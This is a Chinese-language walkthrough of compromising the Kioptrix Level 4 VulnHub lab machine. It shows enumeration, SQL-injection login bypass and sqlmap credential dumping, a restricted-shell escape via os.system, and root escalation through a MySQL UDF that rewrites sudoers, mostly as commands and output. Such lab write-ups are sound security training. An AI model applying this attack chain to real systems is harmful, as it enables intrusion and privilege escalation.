VulnHub-Kioptrix Level 4 受限 Shell 越狱 + Mysql UDF 提权

总字符数: 18.79K

代码: 15.99K, 文本: 0.58K

预计阅读时间: 1.20 小时

Overview

Name	Template
Release Date	2024-03-01
Write-up Author	kill3r
Machine Author	kill3r
Difficulty	Medium
User Flag
Root Flag
Link	https://www.vulnhub.com/entry/kioptrix-level-13-4,25

薄弱点

MySql UDF
restricted Shell Bypass

Nmap扫描

ports=$(nmap -p- --min-rate=1000 -T4 192.168.150.130 | grep -oE '(^[0-9][^/tcp]*)' | tr '\n' ',')
nmap -p$ports -sV -sC -O 192.168.150.130 -oN nmap.txt
# 第一行代码使用nmap命令扫描本地主机的所有端口（从1到65535），--min-rate=1000参数表示每秒发送最少1000个包，-T4参数表示设置扫描速度为快速扫描模式。
# grep -oE '(^[0-9][^/tcp]*)'用于提取输出结果中的端口号，tr '\n' ','用于将提取的端口号按逗号分隔并拼接成一个字符串。
# 第二行代码使用nmap命令再次扫描指定的端口，-p$ports参数表示扫描之前提取的端口列表，-sV参数表示进行服务版本检测，-sC参数表示在扫描过程中使用默认脚本进行常见漏洞探测，-O参数表示进行操作系统版本检测，-oN nmap.txt参数表示将扫描结果保存到名为nmap.txt的文件中。

┌──(root㉿kill3r)-[/home/kill3r]
└─# ports=$(nmap -p- --min-rate=1000 -T4 192.168.150.130 | grep -oE '(^[0-9][^/tcp]*)' | tr '\n' ',')                                                
┌──(root㉿kill3r)-[/home/kill3r]
└─# nmap -p$ports -sV -sC -O 192.168.150.130 -oN nmap.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-26 14:04 CST
Nmap scan report for 192.168.150.130
Host is up (0.00048s latency).

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_  2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 00:0C:29:09:FE:DB (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name: 
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|_  System time: 2024-02-26T09:05:00-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_clock-skew: mean: 10h30m00s, deviation: 3h32m07s, median: 8h00m00s
|_smb2-time: Protocol negotiation failed (SMB2)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.41 seconds

枚举

SMB 枚举

Port: 139 389 445 636

enum4linux-ng 127.0.0.1

$ enum4linux-ng  <ip>
┌──(root㉿kali)-[/opt/vulnhub/0x04]
└─# enum4linux-ng 192.168.150.130 > smb.result

┌──(root㉿kali)-[/opt/vulnhub/0x04]
└─# more smb.result
 ==================================================
|    OS Information via RPC for 192.168.150.130    |
 ==================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[+] Found OS information via 'srvinfo'
[+] After merging OS information we have the following result:
OS: Linux/Unix (Samba 3.0.28a)         
OS version: '4.9'                  
OS release: not supported            
OS build: not supported                    
Native OS: Unix  
Native LAN manager: Samba 3.0.28a            
Platform id: '500'                
Server type: '0x809a03'                    
Server type string: Wk Sv PrQ Unx NT SNT Kioptrix4 server (Samba, Ubuntu)                                                    


┌──(root㉿kali)-[/opt/vulnhub/0x04]
└─# cat smb.result | grep user
[+] Server allows session using username '', password ''
[*] Check for random user
[+] Server allows session using username 'gmbklnrd', password ''
[H] Rerunning enumeration with user 'gmbklnrd' might give more results
[*] Enumerating users via 'querydispinfo'
[+] Found 5 user(s) via 'querydispinfo'
[*] Enumerating users via 'enumdomusers'
[+] Found 5 user(s) via 'enumdomusers'
[+] After merging user results we have 5 user(s) total:
  username: root
  username: loneferret
  username: john
  username: robert
  username: nobody

MSF-SMB

# 基于SMB协议扫描版本号
msf6 > use auxiliary/scanner/smb/smb_version
# 扫描共享文件
msf6 > use auxiliary/scanner/smb/smb_enumshares
# 基于SMB进行用户信息枚举
msf6 > use auxiliary/scanner/smb/smb_lookupsid

Web

HTTP Web Server, Port Like: 80 443 81 8080 8443 4443 8081

Finger:获取有关特定用户或系统上的用户列表和配置信息

`whatweb`

# 用于识别和分析目标网站的技术栈、CMS（内容管理系统）、插件、框架和其他与网站相关的信息。通过分析网站的响应和页面内容
┌──(root㉿kill3r)-[~]
└─# whatweb 192.168.150.130
http://192.168.150.130 [200 OK] Apache[2.4.46], Bootstrap, Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.46 (Debian)], IP[192.168.150.130], Script[text/javascript]

dirb http://192.168.150.130

dirsearch -u http://192.168.150.130 -r

gobuster dir -w ... -u http://192.168.150.130 -x html,php,js,bak

┌──(root㉿kill3r)-[~]
└─# gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -u http://192.168.150.130 -x html,php,js,bak
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.150.130
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              bak,html,php,js
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 358] [--> http://192.168.150.130/images/]                                                              
/index.php            (Status: 200) [Size: 1255]
/.html                (Status: 403) [Size: 327]
/index                (Status: 200) [Size: 1255]
/member               (Status: 302) [Size: 220] [--> index.php]
/member.php           (Status: 302) [Size: 220] [--> index.php]
/logout               (Status: 302) [Size: 0] [--> index.php]
/logout.php           (Status: 302) [Size: 0] [--> index.php]
/john                 (Status: 301) [Size: 356] [--> http://192.168.150.130/john/]                                                                
/robert               (Status: 301) [Size: 358] [--> http://192.168.150.130/robert/]                                                              
/.html                (Status: 403) [Size: 327]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================

漏洞扫描

1 2	$ nikto -h http://www.example.com/ $ nuclei -u https://example.com/

wordlist

cewl.list:cewl http://192.168.150.130/ -w dict.txt

pass.list

1 2	MyNameIsJohn ADGAdsafdfwt4gadfga==

user.list

root
loneferret
john
robert
nobody

hash.list

```

-  information.list

```bash

复现过程

访问靶场,寻找功能点

发现登录功能,尝试万能密码1" or "1"="1/1' or '1'='1

发现报错,并且用户功能点的单引号被转义了,把用户名换成一个正常的试试,密码还是用万能密码

发现存在SQL注入,由于是POST请求,使用BURP抓包,用SQLMAP跑一跑

保存成文件

信息分析

┌──(root㉿kali)-[/opt/vulnhub/0x04]
└─# sqlmap -r sql.txt --leve 3 --batch --dbs
available databases [3]:
[*] information_schema
[*] members
[*] mysql

┌──(root㉿kali)-[/opt/vulnhub/0x04]
└─# sqlmap -r sql.txt --leve 3 --batch -D members --tables
Database: members
[1 table]
+---------+
| members |
+---------+

┌──(root㉿kali)-[/opt/vulnhub/0x04]
└─# sqlmap -r sql.txt --leve 3 --batch -D members -T members --dump
Database: members
Table: members
[2 entries]
+----+-----------------------+----------+
| id | password              | username |
+----+-----------------------+----------+
| 1  | MyNameIsJohn          | john     |
| 2  | ADGAdsafdfwt4gadfga== | robert   |
+----+-----------------------+----------+

使用已知的user.list and pass.list进行密码喷洒

Web界面没有功能点

SSH

┌──(root㉿kali)-[/opt/vulnhub/0x04]
└─# ssh -o HostKeyAlgorithms=ssh-rsa john@192.168.150.130
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ 

┌──(root㉿kali)-[/opt/vulnhub/0x04]
└─# ssh -o HostKeyAlgorithms=ssh-rsa robert@192.168.150.130
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
robert:~$

提示:欢迎来到安全系统,很有可能是受限Shell

john:~$ python -c 'print("Hello, Python!")'
*** unknown command: python
john:~$ python3 -c 'print("Hello, Python!")'
*** unknown command: python3
john:~$ ruby -e 'puts "Hello, Ruby!"'
*** unknown command: ruby
john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$

系统信息收集

john@Kioptrix4:/tmp$ history 
    1  exit
    2  sudo su
    3  clear
    4  ls
    5  cd /home/loneferret
    6  ls
    7  ./nc
    8  rm nc
    9  exit
   10  id

john@Kioptrix4:/tmp$ cat /home/john/.bash_history 
exit
sudo su
clear
ls
cd /home/loneferret
ls
./nc
rm nc
exit


john@Kioptrix4:/tmp$ uname -a
Linux Kioptrix4 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux

john@Kioptrix4:/tmp$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 8.04.3 LTS
Release:        8.04
Codename:       hardy
john@Kioptrix4:/tmp$ 

┌──(root㉿kali)-[/opt/TOP10/burp]
└─# searchsploit Ubuntu 8.04.3    
--------------------------------------- ---------------------------------
 Exploit Title                         |  Path
--------------------------------------- ---------------------------------
Ubuntu < 15.10 - PT Chown Arbitrary PT | linux/local/41760.txt
--------------------------------------- ---------------------------------
Shellcodes: No Results
--------------------------------------- ---------------------------------
 Paper Title                           |  Path
--------------------------------------- ---------------------------------
Debian < 5.0.6 / Ubuntu < 10.04 - Webs | english/15311-debian--5.0.6--ubu
--------------------------------------- ---------------------------------
# 没有可用漏洞,换方向

john@Kioptrix4:/tmp$ sudo -l
[sudo] password for john: 
Sorry, user john may not run sudo on Kioptrix4.

john@Kioptrix4:/tmp$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/apache2/suexec
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/pt_chown
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/traceroute6.iputils
/usr/bin/newgrp
/usr/bin/sudoedit
/usr/bin/chfn
/usr/bin/arping
/usr/bin/gpasswd
/usr/bin/mtr
/usr/bin/passwd
/usr/bin/at
/usr/sbin/pppd
/usr/sbin/uuidd
/lib/dhcp3-client/call-dhclient-script
/bin/mount
/bin/ping6
/bin/fusermount
/bin/su
/bin/ping
/bin/umount
/sbin/umount.cifs
/sbin/mount.cifs
# 没有,下一位
john@Kioptrix4:/home$ cd /var/www/
john@Kioptrix4:/var/www$ cat checklogin.php 
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name

# MySQL无密码,看看能不能第三方应用提权
john@Kioptrix4:/var/www$ whereis lib_mysqludf_sys.so
lib_mysqludf_sys: /usr/lib/lib_mysqludf_sys.so
# 存在lib_mysqludf_sys.so,尝试udf提权
john@Kioptrix4:/var/www$ mysql -uroot -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 9786
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql>

https://jiangjiyue.github.io/2020/12/21/466824cf/

MySQL提权

mysql> SELECT * FROM information_schema.tables WHERE table_name like '%fun%'; 
+---------------+--------------+------------+------------+--------+---------+------------+------------+----------------+-------------+--------------------+--------------+-----------+----------------+---------------------+---------------------+---------------------+-----------------+----------+----------------+------------------------+
| TABLE_CATALOG | TABLE_SCHEMA | TABLE_NAME | TABLE_TYPE | ENGINE | VERSION | ROW_FORMAT | TABLE_ROWS | AVG_ROW_LENGTH | DATA_LENGTH | MAX_DATA_LENGTH    | INDEX_LENGTH | DATA_FREE | AUTO_INCREMENT | CREATE_TIME         | UPDATE_TIME         | CHECK_TIME          | TABLE_COLLATION | CHECKSUM | CREATE_OPTIONS | TABLE_COMMENT          |
+---------------+--------------+------------+------------+--------+---------+------------+------------+----------------+-------------+--------------------+--------------+-----------+----------------+---------------------+---------------------+---------------------+-----------------+----------+----------------+------------------------+
| NULL          | mysql        | func       | BASE TABLE | MyISAM |      10 | Fixed      |          3 |            579 |        1737 | 162974011515469823 |         2048 |         0 |           NULL | 2012-02-04 10:00:35 | 2020-12-21 15:24:46 | 2020-12-21 10:35:01 | utf8_bin        |     NULL |                | User defined functions | 
+---------------+--------------+------------+------------+--------+---------+------------+------------+----------------+-------------+--------------------+--------------+-----------+----------------+---------------------+---------------------+---------------------+-----------------+----------+----------------+------------------------+
1 row in set (0.00 sec)

-- 上方有个func表,属于mysql数据库,查看他存在哪些函数
mysql> select * from mysql.func;
+-----------------------+-----+---------------------+----------+
| name                  | ret | dl                  | type     |
+-----------------------+-----+---------------------+----------+
| lib_mysqludf_sys_info |   0 | lib_mysqludf_sys.so | function | 
| sys_exec              |   0 | lib_mysqludf_sys.so | function | 
+-----------------------+-----+---------------------+----------+
2 rows in set (0.00 sec)

存在sys_exec函数但是无法利用,重新创建个函数试试

mysql> create function sys_eval returns string soname 'udf.so';
ERROR 1046 (3D000): No database selected
mysql> use mysql
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed

mysql> create function sys_eval returns string soname 'lib_mysqludf_sys.so';
Query OK, 0 rows affected (0.00 sec)

mysql> select * from mysql.func;
+-----------------------+-----+---------------------+----------+
| name                  | ret | dl                  | type     |
+-----------------------+-----+---------------------+----------+
| lib_mysqludf_sys_info |   0 | lib_mysqludf_sys.so | function | 
| sys_exec              |   0 | lib_mysqludf_sys.so | function | 
| sys_eval              |   0 | lib_mysqludf_sys.so | function | 
+-----------------------+-----+---------------------+----------+
3 rows in set (0.00 sec)

mysql> select sys_eval('id');
+--------------------------+
| sys_eval('id')           |
+--------------------------+
| uid=0(root) gid=0(root)  | 
+--------------------------+
1 row in set (0.00 sec)

-- 成功提权
mysql> select sys_eval('chown -R john:john /etc/sudoers');
+---------------------------------------------+
| sys_eval('chown -R john:john /etc/sudoers') |
+---------------------------------------------+
|                                             | 
+---------------------------------------------+
1 row in set (0.00 sec)

mysql> exit
Bye

john@Kioptrix4:/var/www$ ls -la /etc/ | grep sudoers
-r--r-----  1 john john      557 2012-02-04 09:58 sudoers
john@Kioptrix4:/var/www$ chmod +w /etc/sudoers 
john@Kioptrix4:/var/www$ ls -la /etc/ | grep sudoers
-rw-r-----  1 john john      557 2012-02-04 09:58 sudoers
john@Kioptrix4:/var/www$ vi /etc/sudoers

john@Kioptrix4:/var/www$ sudo -l
sudo: /etc/sudoers is mode 0640, should be 0440
john@Kioptrix4:/var/www$ chmod 0440 /etc/sudoers										
john@Kioptrix4:/var/www$ mysql -uroot -p
Enter password: 
mysql> select sys_eval('chown -R root:root /etc/sudoers');
+---------------------------------------------+
| sys_eval('chown -R root:root /etc/sudoers') |
+---------------------------------------------+
|                                             | 
+---------------------------------------------+
1 row in set (0.00 sec)				

mysql> exit
Bye

john@Kioptrix4:/var/www$ sudo -l
User john may run the following commands on this host:
    (root) NOPASSWD: ALL
john@Kioptrix4:/var/www$ sudo su
root@Kioptrix4:/var/www# cd /root/
root@Kioptrix4:~# whoami
root
root@Kioptrix4:~# id
uid=0(root) gid=0(root) groups=0(root)